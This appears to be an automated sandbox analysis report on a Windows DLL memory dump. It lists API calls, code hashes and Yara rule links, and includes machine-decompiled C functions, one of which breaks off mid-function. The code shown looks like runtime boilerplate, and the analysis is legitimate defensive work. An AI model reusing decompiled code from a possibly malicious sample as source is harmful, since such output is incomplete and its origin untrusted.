0x6e191f38
0x6e191f38
0x6e191f3d
0x6e191f4b
0x6e191f50
0x6e191f56
0x6e191f5e
0x6e191f63
0x6e191f65
0x6e191f65
0x6e191f6f
0x6e191f6f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E191C8E,74B063F0,00000000), ref: 6E191F1F
GetVersion.KERNEL32 ref: 6E191F2E
GetCurrentProcessId.KERNEL32 ref: 6E191F3D
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E191F56

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 6527c2fbd49248de0c05264d69d5f07607db26e34df62f96e85c3cb8d6502d78
Instruction ID: 96f2eb08e98516e2ef802abd87cfeda8d91ea5c37436889320d4ec9caa210961
Opcode Fuzzy Hash: 6527c2fbd49248de0c05264d69d5f07607db26e34df62f96e85c3cb8d6502d78
Instruction Fuzzy Hash: 5BF09A31684A00AFEF508FB9AC5978A3BE8B717711F19C02AF229C91C4D3B06483BB04

Uniqueness

Uniqueness Score: -1.00%

Function 6E201C7E, Relevance: 4.7, APIs: 3, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E194D40), ref: 6E201CE8
_free.LIBCMT ref: 6E201CD6

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E201EA2

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 2155170405-0
Opcode ID: d8b5bf1e5c700aeb90b6ee437cd01770d09c960b29b1026e463cfa56dedaf93c
Instruction ID: 9675cef3fbd91cb134902f5cccc4290a850ae1a4850142811a2292c024f992e5
Opcode Fuzzy Hash: d8b5bf1e5c700aeb90b6ee437cd01770d09c960b29b1026e463cfa56dedaf93c
Instruction Fuzzy Hash: B151D87190061EEBDB10DFE5CC459DE77BEAF46319B100A6AD560971C0EB309B85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F18EF, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,7FFFFFFF), ref: 6E1F19E7
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,7FFFFFFF), ref: 6E1F19F1
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,7FFFFFFF), ref: 6E1F19FE

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a3f65645219dbd153880cfa9c6bd3f4ab633168962fe2b25d5f4b4db1f7087dc
Instruction ID: 144b0b1c3fb6c0d4e9293e06087b4ebc688dd24923d4431ac828113a3a95dcdd
Opcode Fuzzy Hash: a3f65645219dbd153880cfa9c6bd3f4ab633168962fe2b25d5f4b4db1f7087dc
Instruction Fuzzy Hash: D631D3B5911228ABCB61DF64C8887CDBBB8BF08314F6046DAE41CA7251E7709B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F2120, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6E1F211F,?,?,?,?), ref: 6E1F2142
TerminateProcess.KERNEL32(00000000,?,6E1F211F,?,?,?,?), ref: 6E1F2149
ExitProcess.KERNEL32 ref: 6E1F215B

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5dbb5c85d90c1b3add8c29b329c161ca26f09f530773c9f1e5b9cbd0e53aa25c
Instruction ID: 21821e2cb97974b04011ac9329a290a564fe0d81c3ae50befc12f7e35f8cafcb
Opcode Fuzzy Hash: 5dbb5c85d90c1b3add8c29b329c161ca26f09f530773c9f1e5b9cbd0e53aa25c
Instruction Fuzzy Hash: 18E0E672014648EFCF166F94CD4C98D3B6AEF52645B140414FA0997135CB35D9D2DB94

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F0534, Relevance: 4.0, APIs: 2, Instructions: 950COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1F0669
_free.LIBCMT ref: 6E1F07C8

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b8dc42268dfedf98d12094be3bf27d9cf0ca32c3e870895538069a9728e22642
Instruction ID: 14ada273bdc1ae6630fc24600296f3631232c76f5886c9edd91e88c60d96eef8
Opcode Fuzzy Hash: b8dc42268dfedf98d12094be3bf27d9cf0ca32c3e870895538069a9728e22642
Instruction Fuzzy Hash: 1372C074E0020ADFDB14CFA8C990AEEB7F5EF44304F254569DD45A7349E732AA86DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ED6B0, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fdf9d6de8286cd2b1aec4dbdbf1c33c30447d3a0964aa105c041d8c19639164
Instruction ID: a197827f22342bde0fbc238ab5013bfc753ac4fab539755a907c8cef78c64611
Opcode Fuzzy Hash: 0fdf9d6de8286cd2b1aec4dbdbf1c33c30447d3a0964aa105c041d8c19639164
Instruction Fuzzy Hash: BDF16F71E006199FDF14CFA8C890A9DB7F1FF88314F258269E919AB744D731AA81DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E2162C0, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E2162BB,?,?,00000008,?,?,6E215E3E,00000000), ref: 6E2164ED

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0e04e402b4ee2d2216f468d106898f03132443b356f04ff4caa161ce811397a7
Instruction ID: b3aac0d08abf73e968f029f51fb09a87d160d65c278a5d6dfcc142ad52a15d81
Opcode Fuzzy Hash: 0e04e402b4ee2d2216f468d106898f03132443b356f04ff4caa161ce811397a7
Instruction Fuzzy Hash: 85B1A03122460ADFD714CF68C4D6B987BE2FF05365F158658E9A9CF2A1C735EA81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E192485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E192485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e1941f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e194240 = 1;
										__eflags =  *0x6e194240;
										if( *0x6e194240 != 0) {
											goto L60;
										}
										_t84 =  *0x6e1941f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e194240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e1941f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e194200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e1941fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e194200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e194200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e194240 = 1;
							__eflags =  *0x6e194240;
							if( *0x6e194240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e194200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e194200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e194240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e194200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e1941f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e194200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e194200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e19248f
0x6e192492
0x6e192498
0x6e1924b6
0x00000000
0x6e1924b6
0x6e1924a0
0x6e1924a9
0x6e1924af
0x6e1924be
0x6e1924c1
0x6e1924c4
0x6e1924ce
0x6e1924ce
0x6e1924d0
0x6e1924d3
0x6e1924d5
0x6e1924d5
0x6e1924d7
0x6e1924da
0x00000000
0x00000000
0x6e1924dc
0x6e1924de
0x6e192544
0x6e192544
0x6e1926a2
0x00000000
0x6e1926a2
0x6e1924e0
0x6e1924e0
0x6e1924e4
0x6e1924e6
0x6e1924e6
0x6e1924e6
0x6e1924e6
0x6e1924e9
0x6e1924ea
0x6e1924ed
0x6e1924ed
0x6e1924f1
0x6e1924f5
0x6e192503
0x6e192503
0x6e19250b
0x6e192511
0x6e192513
0x6e192515
0x6e192525
0x6e192532
0x6e192536
0x6e19253b
0x6e19253d
0x6e1925bb
0x6e1925bb
0x6e19253f
0x6e19253f
0x6e19253f
0x6e1925bd
0x6e1925bf
0x6e1926a0
0x6e1926a0
0x00000000
0x6e1925c5
0x6e1925c5
0x6e1925cc
0x00000000
0x00000000
0x6e1925d2
0x6e1925d6
0x6e192632
0x6e192634
0x6e19263c
0x6e19263e
0x6e192640
0x00000000
0x00000000
0x6e192642
0x6e192648
0x6e19264a
0x6e19264c
0x6e192661
0x6e192661
0x6e192663
0x6e192692
0x6e192699
0x00000000
0x6e192699
0x6e192667
0x6e192668
0x6e19266a
0x6e19266c
0x6e19266c
0x6e19266e
0x6e192670
0x6e192672
0x6e192686
0x6e192686
0x6e192689
0x6e19268b
0x6e19268b
0x6e19268c
0x6e19268c
0x00000000
0x6e192674
0x6e192674
0x6e192674
0x6e19267d
0x6e19267e
0x6e192680
0x6e192682
0x6e192682
0x00000000
0x6e192674
0x6e192672
0x6e19264e
0x6e192655
0x6e192655
0x6e192657
0x00000000
0x00000000
0x6e192659
0x6e19265a
0x6e19265d
0x6e19265f
0x00000000
0x00000000
0x00000000
0x6e19265f
0x00000000
0x6e192655
0x6e1925d8
0x6e1925db
0x6e1925e0
0x00000000
0x00000000
0x6e1925e9
0x6e1925eb
0x6e1925f1
0x00000000
0x00000000
0x6e1925f7
0x6e1925fd
0x00000000
0x00000000
0x6e192603
0x6e192605
0x6e19260e
0x6e192612
0x00000000
0x00000000
0x6e192618
0x6e19261b
0x6e19261d
0x00000000
0x00000000
0x6e192624
0x6e192626
0x00000000
0x00000000
0x6e192628
0x6e19262c
0x00000000
0x00000000
0x00000000
0x6e19262c
0x00000000
0x00000000
0x00000000
0x6e192517
0x6e192517
0x6e192517
0x6e19251e
0x00000000
0x00000000
0x6e192520
0x6e192521
0x6e192523
0x00000000
0x00000000
0x00000000
0x6e192523
0x6e19254b
0x6e19254d
0x00000000
0x00000000
0x6e19255d
0x6e19255f
0x6e192561
0x00000000
0x00000000
0x6e192567
0x6e19256e
0x6e19259a
0x6e19259a
0x6e19259c
0x6e19259e
0x6e1925b2
0x6e1925b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1925a0
0x6e1925a0
0x6e1925a0
0x6e1925a9
0x6e1925aa
0x6e1925ac
0x6e1925ae
0x6e1925ae
0x00000000
0x6e1925a0
0x6e192570
0x6e192573
0x6e192575
0x6e192587
0x6e192587
0x6e19258a
0x6e19258c
0x6e19258c
0x6e19258d
0x6e19258d
0x6e192593
0x00000000
0x00000000
0x00000000
0x00000000
0x6e192577
0x6e192577
0x6e192577
0x6e19257e
0x00000000
0x00000000
0x6e192580
0x6e192580
0x6e192581
0x00000000
0x00000000
0x00000000
0x6e192581
0x6e192583
0x6e192585
0x6e192598
0x00000000
0x00000000
0x00000000
0x6e192598
0x00000000
0x6e192585
0x6e1924f7
0x6e1924fa
0x6e1924fd
0x00000000
0x00000000
0x6e1924ff
0x6e192501
0x00000000
0x00000000
0x00000000
0x6e192501
0x6e1924c6
0x6e1924c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E192536

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 7d9d180be229f7b8ddfa2f96784277d42eb69a3c15d358117de866062f5edd0c
Instruction ID: 43dad4434470547eec9158503dad56e3be66b6083dd09a89fa39148e22b6c033
Opcode Fuzzy Hash: 7d9d180be229f7b8ddfa2f96784277d42eb69a3c15d358117de866062f5edd0c
Instruction Fuzzy Hash: DC61C070B146028FEB59CFA9F8A079973B5FBA6314B308469D825C7694E730D8C2FB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DEBB6, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E1DEBCC

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e1f6867a98d284232512ba1ea4795e75451558bd6a5fa330e4a7f08403b892cf
Instruction ID: 4b3ee33304a1a1f81ebc2e96272e63069848dfd7de5d78ed6a39d9963a5917cb
Opcode Fuzzy Hash: e1f6867a98d284232512ba1ea4795e75451558bd6a5fa330e4a7f08403b892cf
Instruction Fuzzy Hash: 3D519EB1E04A058FDF28CFA4C59639AB7F1FB58311F20842AC515EB344D774AB84DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F917A, Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

0, xrefs: 6E1F9321

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c9f60c04fbf6183481a51afce056a40c43604793713b0c28dbbcba3caabb2e6d
Instruction ID: 6f637245b68b10b2164c8efb22b65217689151a865642eafb5ea90129774096c
Opcode Fuzzy Hash: c9f60c04fbf6183481a51afce056a40c43604793713b0c28dbbcba3caabb2e6d
Instruction Fuzzy Hash: B5616A3064860ADADB54FEED48B0BAE73E5AF62304F20082AD851DB2D0DB1199C7F7C1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F8861, Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

0, xrefs: 6E1F89EC

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: a8260bac03ee4dfd0c900f68f53ac5e39c0acae119282dbe163888cfff0ffc0b
Instruction ID: d3151bcffc4ef8f70a8bc4d9f623bf1b52b929e156b47568ca6a6f7a6278bb69
Opcode Fuzzy Hash: a8260bac03ee4dfd0c900f68f53ac5e39c0acae119282dbe163888cfff0ffc0b
Instruction Fuzzy Hash: F351283060464ADBDB54C9EB88A17AE77E9BFA2344F24081DD48397281C73599C7B3D6

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F862F, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 6E1F87AB

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b8b6aa48bda707f2869db1882f7404d1c9cfba8873232cbf7aae36e10b2864e4
Instruction ID: 8fcdfb34def415cfa2573d4e8a8ecf127506bfb6d4fd994622454abbe1caaf4f
Opcode Fuzzy Hash: b8b6aa48bda707f2869db1882f7404d1c9cfba8873232cbf7aae36e10b2864e4
Instruction Fuzzy Hash: D051CDB0600645DBDB94C9EB98A27EE77D99F22358F200A1DD462CB280D731D9C7F6D1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F8AA2, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 6E1F8C1E

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: a509ba99d373decff709b22e6fca3f615ad7e4a2bc2872a165842f100db95bba
Instruction ID: 4b8dec1f74ac4fe5109d99faa1f9fa9434d83e733d39cced1d7fd3f61e5930f6
Opcode Fuzzy Hash: a509ba99d373decff709b22e6fca3f615ad7e4a2bc2872a165842f100db95bba
Instruction Fuzzy Hash: 515127B0244649DBDB948AEB84B17EE77DAAF22308F600859D441DB280D7359DC7F3D5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EAB67, Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018f4f1f4f3b1db173cce2e93719c973b52f11e18d1016e8a79ba26c837dcf5f
Instruction ID: 14e1bd3eb312afe4f4a7fe287349cfda09de2f99f8558786bf3fe32ce3ed21cc
Opcode Fuzzy Hash: 018f4f1f4f3b1db173cce2e93719c973b52f11e18d1016e8a79ba26c837dcf5f
Instruction Fuzzy Hash: 8602A271A006258FDB65CF58C890BAAB7F8FF4A304F5540EAE949E7648D7309EC09F41

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EE050, Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 663f657c889b2ea207d767c426d7408ad41003398744ddaf3cd6aa7a8ecf2235
Instruction ID: 4e49e14de5dc5e4a544f2b8bf5d030a47fe7125d9c0c0c5bd9ebee88979408d5
Opcode Fuzzy Hash: 663f657c889b2ea207d767c426d7408ad41003398744ddaf3cd6aa7a8ecf2235
Instruction Fuzzy Hash: BDE18171A006298FDB65CF98C890B9AB7B8FF46304F1540EAE949EB644D7709FC19F81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EDC20, Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d98ed2b9a0fa24017a2fce53a670e82b8221196f379f62bbb328d8669ff08c87
Instruction ID: 19fc622e3bb6fa6cab80a8a9f8e9e2fe319aecce4ab904ad36bd25e3baf08af7
Opcode Fuzzy Hash: d98ed2b9a0fa24017a2fce53a670e82b8221196f379f62bbb328d8669ff08c87
Instruction Fuzzy Hash: CE917271A005658BDB24CF68C890BDDB7B5FFD9304F2541EAE809EB644D7709E819F80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EB617, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd16bbd6c326d4e8212feb0afa906c0b57185bc48de0426693217f9c8ca3e5cb
Instruction ID: 8d2657c77e0021011287116f01f7c49ee519b9e02793cd074797378a06950078
Opcode Fuzzy Hash: dd16bbd6c326d4e8212feb0afa906c0b57185bc48de0426693217f9c8ca3e5cb
Instruction Fuzzy Hash: B251AF71E00619EFDF04CF99C990AEEBBB2FF88304F198099E514AB245C7349E91DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E208CB7, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f124765af454a6467f9ddc055bab6a1336a518ac177a8273f88f9a60b06d35ad
Instruction ID: 0f9d276161faa36e8eaaf509ea7dd1f70a19c7b638d898c681c5131dbb41bcef
Opcode Fuzzy Hash: f124765af454a6467f9ddc055bab6a1336a518ac177a8273f88f9a60b06d35ad
Instruction Fuzzy Hash: A921A473F20539477B0CC47E8C572B9B6E1868C511745423AE8A6EA2C1D968D917E2A4

Uniqueness

Uniqueness Score: -1.00%

Function 6E208B97, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 548d4a38baa9c2c3b078cf0744ea834d21977db340c09fc8d597c93a740ef801
Instruction ID: 8b0520636b1f9bde3b192ce7e49d213fcb6ee044d509ad857fbadde801754b36
Opcode Fuzzy Hash: 548d4a38baa9c2c3b078cf0744ea834d21977db340c09fc8d597c93a740ef801
Instruction Fuzzy Hash: E9117763F30C295B675C81BD8C172AA96D3DBD825070F533AD826E73C4E994DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 6E192264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E192264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E1923CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E192485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
